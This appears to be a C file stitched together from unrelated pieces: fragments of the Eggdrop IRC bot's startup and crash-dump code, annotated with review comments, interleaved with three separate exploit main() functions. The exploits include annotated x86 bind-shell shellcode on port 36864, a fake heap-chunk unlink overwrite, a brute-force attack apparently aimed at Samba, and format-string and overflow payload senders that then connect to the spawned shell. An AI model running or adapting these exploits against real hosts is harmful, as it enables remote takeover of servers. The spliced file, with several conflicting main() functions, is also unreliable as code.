        for (p = module_list; p; p = p->next) {
          if (p->funcs) {
            startfunc = p->funcs[MODCALL_START];
            startfunc(NULL);
          }
        }

        rehash();
        restart_chons();
        call_hook(HOOK_LOADED);
      }
      do_restart = 0;
    }
  }
}
int main(int argc,char *argv[]) { int at_sock; int ts_sock; int port=PORT; int roup; char ttatk_code[36864]; char hostname[0x82]=HOST; char main_str[] = /* BIND SHELL ON PORT TCP/36864 */ //------------------- main: -------------------// "\xeb\x72" /* jmp callz */ //------------------- start: ------------------// "\x5e" /* popl %esi */ //------------------ socket() -----------------// "\x29\xc0" /* subl %eax, %eax */ "\x89\x46\x10" /* movl %eax, 0x10(%esi) */ "\x40" /* incl %eax */ "\x89\xc3" /* movl %eax, %ebx */ "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ "\x40" /* incl %eax */ "\x89\x46\x08" /* movl %eax, 0x08(%esi) */ "\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ "\xb0\x66" /* movb $0x66, %al */ "\xcd\x80" /* int $0x80 */ //------------------- bind() ------------------// "\x43" /* incl %ebx */ "\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */ "\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */ "\x88\x46\x08" /* movb %al, 0x08(%esi) */ "\x29\xc0" /* subl %eax, %eax */ "\x89\xc2" /* movl %eax, %edx */ "\x89\x46\x18" /* movl %eax, 0x18(%esi) */ "\xb0\x90" /* movb $0x90, %al */ "\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */ "\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */ "\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */ "\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ "\xb0\x66" /* movb $0x66, %al */ "\xcd\x80" /* int $0x80 */ //------------------ listen() -----------------// "\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */ "\x43" /* incl %ebx */ "\x43" /* incl %ebx */ "\xb0\x66" /* movb $0x66, %al */ "\xcd\x80" /* int $0x80 */ //------------------ accept() -----------------// "\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */ "\x89\x56\x10" /* movl %edx, 0x10(%esi) */ "\xb0\x66" /* movb $0x66, %al */ "\x43" /* incl %ebx */ "\xcd\x80" /* int $0x80 */ //---- dup2(s, 0), dup2(s, 1), dup2(s, 2) -----// "\x86\xc3" /* xchgb %al, %bl */ "\xb0\x3f" /* movb $0x3f, %al */ "\x29\xc9" /* subl %ecx, %ecx */ "\xcd\x80" /* int $0x80 */ "\xb0\x3f" /* movb $0x3f, %al */ "\x41" /* incl %ecx */ "\xcd\x80" /* int $0x80 */ 
"\xb0\x3f" /* movb $0x3f, %al */ "\x41" /* incl %ecx */ "\xcd\x80" /* int $0x80 */ //------------------ execve() -----------------// "\x88\x56\x07" /* movb %dl, 0x07(%esi) */ "\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */ "\x87\xf3" /* xchgl %esi, %ebx */ "\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */ "\xb0\x0b" /* movb $0x0b, %al */ "\xcd\x80" /* int $0x80 */ //------------------- callz: ------------------// "\xe8\x89\xff\xff\xff" /* call start */ "/bin/sh"; /* 128byte */ #define plus_4str(x0x) x0x+=4 int x0x_num=0; int x0x_size=0; #define BUF_LEN 1024 char *debug_test; char code_128len[BUF_LEN]; char x82_16x0x[]={ /* 16byte */ 0x82,0x82,0x82,0x82,0x82, 0x82,0x82,0x82,0x82,0x82, 0x82,0x82,0x82,0x82,0x82, 0x82 }; char nop_n_jump[4]={0x41,0xeb,0x0c,0x42}; int nop_12jump=0; int ok_cont=0; int target_type_number=0; char p_rev_size[4]={0xff,0xff,0xff,0xfc}; /* chunk size */ char size_fd[4]={0xff,0xff,0xff,0xff}; /* data section size */ char atk_chunk[BUF_LEN]; unsigned long retloc=pl_form[target_type_number].retloc; unsigned long retaddr=pl_form[target_type_number].retaddr;//.stkaddr; memset(ttatk_code,0x00,36864); memset(atk_chunk,0x00,BUF_LEN); memset(code_128len,0x00,BUF_LEN); (void)banrl(argv[0]); while((roup=getopt(argc,argv,"R:r:S:s:H:h:P:p:"))!=EOF) { switch(roup) { case 'R': case 'r': retloc=strtoul(optarg,NULL,0); break; case 'S': case 's': retaddr=strtoul(optarg,NULL,0); break; case 'H': case 'h': memset(hostname,0x00,0x82); strncpy(hostname,optarg,0x82); break; case 'P': case 'p': port=atoi(optarg); break; case '?': (void)usage(argv[0]); break; } } //--- make fake chunk ---// fprintf(stdout," [1] Make fake chunk.\n"); for(x0x_num=0;x0x_num<strlen(x82_16x0x);x0x_num++) atk_chunk[x0x_num]=x82_16x0x[x0x_num]; *(long*)&atk_chunk[x0x_num]=0xfffffffc; // prev_size plus_4str(x0x_num); *(long*)&atk_chunk[x0x_num]=0xffffffff; // size(P) plus_4str(x0x_num); *(long*)&atk_chunk[x0x_num]=retloc-0x0c; // Forward pointer plus_4str(x0x_num); *(long*)&atk_chunk[x0x_num]=retaddr; // 
Back pointer plus_4str(x0x_num); //--- make code ---// fprintf(stdout," [2] Make shellcode.\n"); for(nop_12jump=0;nop_12jump<0x190;plus_4str(nop_12jump)) *(long*)&code_128len[nop_12jump]=0x41eb0c42; for(x0x_num=0,ok_cont=nop_12jump;x0x_num<strlen(main_str);x0x_num++) code_128len[ok_cont++]=main_str[x0x_num]; //--- fake chunk + 0x20 + (nop + 12byte jmpcode + nop + shellcode) ---// snprintf(ttatk_code,36864, "%s%s%s\r\n",atk_chunk,"\x20",code_128len); fprintf(stdout," [3] Send exploit (bindshell) code.\n"); { // Try two times connections. It's Point. :-) /* 1 */ at_sock=setsock(hostname,port); re_conenter(at_sock); send(at_sock,ttatk_code,strlen(ttatk_code),0); close(at_sock); /* 2 */ at_sock=setsock(hostname,port); re_conenter(at_sock); send(at_sock,ttatk_code,strlen(ttatk_code),0); } fprintf(stdout," [4] Waiting, executes the shell !\n"); sleep(3); fprintf(stdout," [5] Trying %s:36864 ...\n",hostname); /* 3 */ ts_sock=setsock(hostname,36864); re_conenter(ts_sock); fprintf(stdout," [6] Connected to %s:36864 !\n\n",hostname); // Execute bash shell getshell(ts_sock); }
int main(int argc,char *argv[]) { int sock,whtl,type=0,brute_f=0; char tg_host[0x82]="localhost"; u_long shell=plat[type].shell; (void)banrl(); if(argc<2) { (void)usage(argv[0]); } while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1) { extern char *optarg; switch(whtl) { case 'H': case 'h': memset((char *)tg_host,0,sizeof(tg_host)); strncpy(tg_host,optarg,sizeof(tg_host)-1); break; case 'S': case 's': shell=strtoul(optarg,0,0); break; case 'T': case 't': if((type=atoi(optarg))>1) { (void)usage(argv[0]); } else shell=plat[type].shell; break; case 'I': case 'i': (void)usage(argv[0]); break; case 'B': case 'b': brute_f++; break; case '?': fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]); exit(-1); break; } } if(brute_f) { fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT); fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n"); fprintf(stdout," [*] Brute-Force mode:\n\n"); fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|"); fprintf(stdout,"\n |"); for(brute_f=0;brute_f<BRUTE_AT;brute_f++) { fflush(stdout); fprintf(stdout,"="); shell+=(0x100); sock=(int)setsock(tg_host,ATK_PORT); if((int)re_connt(sock,0)==-1) { while(!(brute_f>=BRUTE_AT-1)) { fprintf(stdout,"="); brute_f++; } fprintf(stdout,"|\n\n"); fprintf(stderr," [-] Connect Failed.\n\n"); exit(-1); } __atk_code_send_recv(sock,shell); close(sock); sleep(2); sock=(int)setsock(tg_host,SH_PORT); if((int)re_connt(sock,0)==-1) { continue; } while(!(brute_f>=BRUTE_AT-1)) { fprintf(stdout,"="); brute_f++; } fprintf(stdout,"|\n\n"); fprintf(stdout," [+] Shellcode address: %p\n",shell); fprintf(stdout," [*] Brute-Force end !!\n\n"); fprintf(stdout," **\n ** Bind shellcode is port 10000.\n"); fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n"); (void)send_recv_sh(sock); } fprintf(stdout,"|\n\n **\n"); fprintf(stdout," ** Brute-Force exploit failed. 
Reason is simple.\n **\n"); fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT); fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n"); fprintf(stdout," ** OOops ! is server Samba version doubtful ??\n **\n\n"); exit(-1); } else { fprintf(stdout," [0] Target: %s\n",plat[type].ost); fprintf(stdout," [1] Set socket.\n"); sock=(int)setsock(tg_host,ATK_PORT); (int)re_connt(sock,1); fprintf(stdout," [2] Make shellcode & Send Packet.\n"); __atk_code_send_recv(sock,shell); close(sock); fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT); sleep(2); sock=(int)setsock(tg_host,SH_PORT); (int)re_connt(sock,1); fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT); (void)send_recv_sh(sock); } }
/* Process entry point.
 *
 * Installs the fatal-signal handlers, initialises the subsystems, refuses
 * to run as root (except under CYGWIN_HACKS), validates and writes the pid
 * file, optionally daemonises, sets up the console DCC chat when running in
 * the foreground with term_z, registers the periodic hooks and then loops
 * on mainloop() forever.  The real argc/argv are copied into the globals
 * argc/argv for the rest of the program. */
int main(int arg_c, char **arg_v)
{
  int i, xx;
  char s[25];
  FILE *f;
  struct sigaction sv;
  struct chanset_t *chan;
#ifdef DEBUG
  struct rlimit cdlim;
#endif
#ifdef STOP_UAC
  int nvpair[2];
#endif

  /* Make sure it can write core, if you make debug. Else it's pretty
   * useless (dw)
   *
   * Only allow unlimited size core files when compiled with DEBUG defined.
   * This is not a good idea for normal builds -- in these cases, use the
   * default system resource limits instead. */
#ifdef DEBUG
  cdlim.rlim_cur = RLIM_INFINITY;
  cdlim.rlim_max = RLIM_INFINITY;
  setrlimit(RLIMIT_CORE, &cdlim);
#endif

#ifdef DEBUG_CONTEXT
  /* Initialise context list */
  for (i = 0; i < 16; i++)
    Context;
#endif

  /* Include patch.h header for patch("...") */
#include "patch.h"

  argc = arg_c;
  argv = arg_v;

  /* Version info! */
  egg_snprintf(ver, sizeof ver, "eggdrop v%s", egg_version);
  egg_snprintf(version, sizeof version, "Eggdrop v%s (C) 1997 Robey Pointer (C) 2010 Eggheads", egg_version);
  /* Now add on the patchlevel (for Tcl).
   * NOTE(review): these two writes into egg_version are unbounded (sprintf at
   * the current end, then strcat); they are only safe if egg_version was
   * declared large enough for " <numver>" plus egg_xtra — confirm at its
   * declaration. */
  sprintf(&egg_version[strlen(egg_version)], " %u", egg_numver);
  strcat(egg_version, egg_xtra);

  /* For OSF/1 */
#ifdef STOP_UAC
  /* Don't print "unaligned access fixup" warning to the user */
  nvpair[0] = SSIN_UACPROC;
  nvpair[1] = UAC_NOPRINT;
  setsysinfo(SSI_NVPAIRS, (char *) nvpair, 1, NULL, 0);
#endif

  /* Set up error traps.  SIGBUS and SIGSEGV use SA_RESETHAND where available
   * so a second fault inside the handler terminates instead of re-entering;
   * the remaining handlers are installed with sa_flags = 0. */
  sv.sa_handler = got_bus;
  sigemptyset(&sv.sa_mask);
#ifdef SA_RESETHAND
  sv.sa_flags = SA_RESETHAND;
#else
  sv.sa_flags = 0;
#endif
  sigaction(SIGBUS, &sv, NULL);
  sv.sa_handler = got_segv;
  sigaction(SIGSEGV, &sv, NULL);
#ifdef SA_RESETHAND
  sv.sa_flags = 0;
#endif
  sv.sa_handler = got_fpe;
  sigaction(SIGFPE, &sv, NULL);
  sv.sa_handler = got_term;
  sigaction(SIGTERM, &sv, NULL);
  sv.sa_handler = got_hup;
  sigaction(SIGHUP, &sv, NULL);
  sv.sa_handler = got_quit;
  sigaction(SIGQUIT, &sv, NULL);
  sv.sa_handler = SIG_IGN;
  sigaction(SIGPIPE, &sv, NULL);
  sv.sa_handler = got_ill;
  sigaction(SIGILL, &sv, NULL);
  sv.sa_handler = got_alarm;
  sigaction(SIGALRM, &sv, NULL);

  /* Initialize variables and stuff */
  now = time(NULL);
  chanset = NULL;
  egg_memcpy(&nowtm, localtime(&now), sizeof(struct tm));
  lastmin = nowtm.tm_min;
  /* Seed derived from the clock and two pids only — easily guessable, so
   * random() must not be relied on for anything security-sensitive. */
  srandom((unsigned int) (now % (getpid() + getppid())));
  init_mem();
  init_language(1);
  if (argc > 1)
    for (i = 1; i < argc; i++)
      do_arg(argv[i]);
  printf("\n%s\n", version);

#ifndef CYGWIN_HACKS
  /* Don't allow eggdrop to run as root
   * This check isn't useful under cygwin and has been
   * reported to cause trouble in some situations. */
  if (((int) getuid() == 0) || ((int) geteuid() == 0))
    fatal("ERROR: Eggdrop will not run as root!", 0);
#endif

#ifndef REPLACE_NOTIFIER
  init_threaddata(1);
#endif
  init_userent();
  init_misc();
  init_bots();
  init_modules();
  if (backgrd)
    bg_prepare_split();
  init_tcl(argc, argv);
  init_language(0);
#ifdef STATIC
  link_statics();
#endif
  /* ctime() text with the time-of-day field (columns 11..19) cut out. */
  strncpyz(s, ctime(&now), sizeof s);
  strcpy(&s[11], &s[20]);
  putlog(LOG_ALL, "*", "--- Loading %s (%s)", ver, s);
  chanprog();
  if (!encrypt_pass) {
    printf(MOD_NOCRYPT);
    bg_send_quit(BG_ABORT);
    exit(1);
  }
  i = 0;
  for (chan = chanset; chan; chan = chan->next)
    i++;
  putlog(LOG_MISC, "*", "=== %s: %d channels, %d users.", botnetnick, i, count_users(userlist));
#ifdef TLS
  ssl_init();
#endif
  cache_miss = 0;
  cache_hit = 0;
  if (!pid_file[0])
    egg_snprintf(pid_file, sizeof pid_file, "pid.%s", botnetnick);

  /* Check for pre-existing eggdrop!
   * NOTE(review): f is never fclose()d, so the descriptor leaks for the
   * life of the process.  The fgets() result is unchecked — on an empty
   * file s still holds the ctime text from above — and atoi() of a
   * malformed file yields 0, which makes kill(0, SIGCHLD) signal the
   * caller's whole process group and succeed, i.e. "already running". */
  f = fopen(pid_file, "r");
  if (f != NULL) {
    fgets(s, 10, f);
    xx = atoi(s);
    i = kill(xx, SIGCHLD); /* Meaningless kill to determine if pid is used */
    if (i == 0 || errno != ESRCH) {
      printf(EGG_RUNNING1, botnetnick);
      printf(EGG_RUNNING2, pid_file);
      bg_send_quit(BG_ABORT);
      exit(1);
    }
  }

  /* Move into background? */
  if (backgrd) {
    bg_do_split();
  } else { /* !backgrd */
    xx = getpid();
    if (xx != 0) {
      FILE *fp;
      /* Write pid to file (xx is an int; %u is a mismatched conversion) */
      unlink(pid_file);
      fp = fopen(pid_file, "w");
      if (fp != NULL) {
        fprintf(fp, "%u\n", xx);
        if (fflush(fp)) {
          /* Let the bot live since this doesn't appear to be a botchk */
          printf(EGG_NOWRITE, pid_file);
          fclose(fp);
          unlink(pid_file);
        } else
          fclose(fp);
      } else
        printf(EGG_NOWRITE, pid_file);
    }
  }
  use_stderr = 0; /* Stop writing to stderr now */
  if (backgrd) {
    /* Ok, try to disassociate from controlling terminal (finger cross) */
#ifdef HAVE_SETPGID
    setpgid(0, 0);
#endif
    /* Tcl wants the stdin, stdout and stderr file handles kept open. */
    freopen("/dev/null", "r", stdin);
    freopen("/dev/null", "w", stdout);
    freopen("/dev/null", "w", stderr);
#ifdef CYGWIN_HACKS
    FreeConsole();
#endif
  }

  /* Terminal emulating dcc chat */
  if (!backgrd && term_z) {
    int n = new_dcc(&DCC_CHAT, sizeof(struct chat_info));
    getvhost(&dcc[n].sockname, AF_INET);
    dcc[n].sock = STDOUT;
    dcc[n].timeval = now;
    dcc[n].u.chat->con_flags = conmask;
    dcc[n].u.chat->strip_flags = STRIP_ALL;
    dcc[n].status = STAT_ECHO;
    strcpy(dcc[n].nick, "HQ");
    strcpy(dcc[n].host, "llama@console");
    /* HACK: Workaround not to pass literal "HQ" as a non-const arg */
    dcc[n].user = get_user_by_handle(userlist, dcc[n].nick);
    /* Make sure there's an innocuous HQ user if needed */
    if (!dcc[n].user) {
      userlist = adduser(userlist, dcc[n].nick, "none", "-", USER_PARTY);
      dcc[n].user = get_user_by_handle(userlist, dcc[n].nick);
    }
    setsock(STDOUT, 0); /* Entry in net table */
    dprintf(n, "\n### ENTERING DCC CHAT SIMULATION ###\n\n");
    dcc_chatter(n);
  }
  then = now;
  online_since = now;
  autolink_cycle(NULL); /* Hurry and connect to tandem bots */
  add_help_reference("cmds1.help");
  add_help_reference("cmds2.help");
  add_help_reference("core.help");
  add_hook(HOOK_SECONDLY, (Function) core_secondly);
  add_hook(HOOK_MINUTELY, (Function) core_minutely);
  add_hook(HOOK_HOURLY, (Function) core_hourly);
  add_hook(HOOK_REHASH, (Function) event_rehash);
  add_hook(HOOK_PRE_REHASH, (Function) event_prerehash);
  add_hook(HOOK_USERFILE, (Function) event_save);
  add_hook(HOOK_BACKUP, (Function) backup_userfile);
  add_hook(HOOK_DAILY, (Function) event_logfile);
  add_hook(HOOK_DAILY, (Function) event_resettraffic);
  add_hook(HOOK_LOADED, (Function) event_loaded);
  call_hook(HOOK_LOADED);
  debug0("main: entering loop");
  /* Never returns; mainloop() is driven until the process exits elsewhere. */
  while (1) {
    mainloop(1);
  }
}
/* Dump crash diagnostics to a file in the current directory.
 *
 * First call: logs the last context, writes "DEBUG" (build info, Tcl
 * info, the 16-slot context ring, the DCC table and memory stats) and
 * returns.  If the function is re-entered (nested_debug already set, i.e.
 * a fault occurred while writing the first dump) it writes a minimal
 * "DEBUG.DEBUG" that avoids the context notes and exits the process.
 *
 * Side effect: cx_ptr is masked to the ring size (& 15) on both paths. */
static void write_debug()
{
  int x;
  char s[25];
  int y;

  if (nested_debug) {
    /* Yoicks, if we have this there's serious trouble!
     * All of these are pretty reliable, so we'll try these.
     *
     * NOTE: dont try and display context-notes in here, it's
     * _not_ safe <cybah> */
    x = creat("DEBUG.DEBUG", 0644);
    /* NOTE(review): setsock() is handed x before the creat() result is
     * checked, so it receives -1 on failure. */
    setsock(x, SOCK_NONSOCK);
    if (x >= 0) {
      strncpyz(s, ctime(&now), sizeof s);
      dprintf(-x, "Debug (%s) written %s\n", ver, s);
      dprintf(-x, "Please report problem to [email protected]\n");
      dprintf(-x, "after a visit to http://www.eggheads.org/bugzilla/\n");
      dprintf(-x, "Full Patch List: %s\n", egg_xtra);
      dprintf(-x, "Context: ");
      cx_ptr = cx_ptr & 15;
      /* Walk the ring from the oldest entry up to (not including) cx_ptr;
       * y == cx_ptr when the loop ends, so the last line prints that slot. */
      for (y = ((cx_ptr + 1) & 15); y != cx_ptr; y = ((y + 1) & 15))
        dprintf(-x, "%s/%d,\n ", cx_file[y], cx_line[y]);
      dprintf(-x, "%s/%d\n\n", cx_file[y], cx_line[y]);
      killsock(x);
      close(x);
    }
    bg_send_quit(BG_ABORT);
    exit(1); /* Dont even try & tell people about, that may
              * have caused the fault last time. */
  } else
    nested_debug = 1;

  putlog(LOG_MISC, "*", "* Last context: %s/%d [%s]", cx_file[cx_ptr], cx_line[cx_ptr], cx_note[cx_ptr][0] ? cx_note[cx_ptr] : "");
  putlog(LOG_MISC, "*", "* Please REPORT this BUG!");
  putlog(LOG_MISC, "*", "* Check doc/BUG-REPORT on how to do so.");
  /* NOTE(review): creat() opens a fixed relative path with O_TRUNC and no
   * O_EXCL, so a pre-existing file or symlink at ./DEBUG is followed and
   * truncated; an open() with O_EXCL | O_NOFOLLOW would be stricter. */
  x = creat("DEBUG", 0644);
  setsock(x, SOCK_NONSOCK); /* same ordering issue as above: x may be -1 here */
  if (x < 0) {
    putlog(LOG_MISC, "*", "* Failed to write DEBUG");
  } else {
    strncpyz(s, ctime(&now), sizeof s);
    dprintf(-x, "Debug (%s) written %s\n", ver, s);
    dprintf(-x, "Full Patch List: %s\n", egg_xtra);
#ifdef STATIC
    dprintf(-x, "STATICALLY LINKED\n");
#endif
    /* info library */
    dprintf(-x, "Tcl library: %s\n", ((interp) && (Tcl_Eval(interp, "info library") == TCL_OK)) ? tcl_resultstring() : "*unknown*");
    /* info tclversion/patchlevel
     * NOTE(review): the fallback Tcl_Eval(interp, "info tclversion") does not
     * repeat the (interp) guard, so it is reached with a NULL interp when the
     * first test fails for that reason. */
    dprintf(-x, "Tcl version: %s (header version %s)\n", ((interp) && (Tcl_Eval(interp, "info patchlevel") == TCL_OK)) ? tcl_resultstring() : (Tcl_Eval(interp, "info tclversion") == TCL_OK) ? tcl_resultstring() : "*unknown*", TCL_PATCH_LEVEL ? TCL_PATCH_LEVEL : "*unknown*");
    if (tcl_threaded())
      dprintf(-x, "Tcl is threaded\n");
#ifdef IPV6
    dprintf(-x, "Compiled with IPv6 support\n");
#else
    dprintf(-x, "Compiled without IPv6 support\n");
#endif
#ifdef TLS
    dprintf(-x, "Compiled with TLS support\n");
#else
    dprintf(-x, "Compiled without TLS support\n");
#endif
    dprintf(-x, "Configure flags: %s\n", EGG_AC_ARGS);
#ifdef CCFLAGS
    dprintf(-x, "Compile flags: %s\n", CCFLAGS);
#endif
#ifdef LDFLAGS
    dprintf(-x, "Link flags: %s\n", LDFLAGS);
#endif
#ifdef STRIPFLAGS
    dprintf(-x, "Strip flags: %s\n", STRIPFLAGS);
#endif
    dprintf(-x, "Context: ");
    cx_ptr = cx_ptr & 15;
    /* Same ring walk as the nested path, this time including the notes. */
    for (y = ((cx_ptr + 1) & 15); y != cx_ptr; y = ((y + 1) & 15))
      dprintf(-x, "%s/%d, [%s]\n ", cx_file[y], cx_line[y], (cx_note[y][0]) ? cx_note[y] : "");
    dprintf(-x, "%s/%d [%s]\n\n", cx_file[cx_ptr], cx_line[cx_ptr], (cx_note[cx_ptr][0]) ? cx_note[cx_ptr] : "");
    tell_dcc(-x);
    dprintf(-x, "\n");
    debug_mem_to_dcc(-x);
    killsock(x);
    close(x);
    putlog(LOG_MISC, "*", "* Wrote DEBUG");
  }
}
/* Entry point: parses options, selects the per-platform parameters from
 * platform[type], builds the payload via make_fmt_code()/make_bof_code(),
 * sends it once and then connects to the fixed port 36864.  Falls off the
 * end without a return statement (C99 treats that as return 0 for main()).
 *
 * NOTE(review): the helper return values are cast away throughout and
 * send()'s result (including a short send) is never checked. */
int main(int argc,char *argv[])
{
  int sock,type=0;
  int port=(PORT);   /* no option in the getopt string changes this */
  char host[256]=DEF_HOST;
  int sflag=platform[type].sflag;
  unsigned long retloc=platform[type].dtors_addr;
  unsigned long shell=platform[type].shell;

  (void)banrl();
  /* sock doubles as the getopt() return value here; EOF is compared rather
   * than -1 (equal on common platforms, but getopt() is specified to return -1). */
  while((sock=getopt(argc,argv,"DdF:f:R:r:S:s:H:h:T:t:Ii"))!=EOF) {
    extern char *optarg;
    switch(sock) {
    case 'D': case 'd': __debug_chk=1; break;
    case 'R': case 'r': retloc=strtoul(optarg,NULL,0); break;   /* base 0: decimal, 0x hex or leading-0 octal */
    case 'S': case 's': shell=strtoul(optarg,NULL,0); break;
    case 'F': case 'f': sflag=atoi(optarg); break;
    case 'H': case 'h':
      /* Bounded copy; the final byte is left as the memset NUL. */
      memset((char *)host,0,sizeof(host));
      strncpy(host,optarg,sizeof(host)-1);
      break;
    case 'T': case 't':
      /* NOTE(review): only the upper bound is checked; a negative -t value
       * indexes platform[] out of bounds.  Also assumes usage() exits —
       * if it returns, platform[type] below is read with type >= 4. */
      type=atoi(optarg);
      if(type>=4){
        (void)usage(argv[0]);
      } else {
        retloc=platform[type].dtors_addr;
        shell=platform[type].shell;
        sflag=platform[type].sflag;
      }
      break;
    case 'I': case 'i': (void)usage(argv[0]); break;
    case '?':
      fprintf(stderr,"Try `%s -i' for more information.\n\n",argv[0]);
      exit(-1);   /* reported as status 255 on POSIX */
      break;
    }
  }
  fprintf(stdout," #\n # target host: %s:%d\n",host,port);
  fprintf(stdout," # type: %s\n",platform[type].os_type);
  /* Types 0/1 use the format-string builder, 2/3 the overflow builder; no
   * default case, so an out-of-range type reaches the sends with t_atk unset. */
  switch(type) {
  case 0: case 1: (int)make_fmt_code(retloc,shell,sflag); break;
  case 2: (int)make_bof_code(shell,sflag,0); break;
  case 3: (int)make_bof_code(shell,sflag,1);
  }
  /* NOTE(review): strlen() returns size_t but is printed with %d; %zu matches. */
  fprintf(stdout," # send code size: %d byte\n",strlen(t_atk));
  sock=setsock(host,port);
  (void)re_connt(sock);   /* presumably exits on failure — confirm, the result is discarded */
  if(__debug_chk) sleep(10);
  send(sock,t_atk,strlen(t_atk),0);
  close(sock);
  fprintf(stdout," #\n # Waiting rootshell, Trying %s:36864 ...\n",host);
  sleep(1);
  sock=setsock(host,36864);
  (void)re_connt(sock);
  fprintf(stdout," # connected to %s:36864 !\n #\n\n",host);
  (void)conn_shell(sock);
}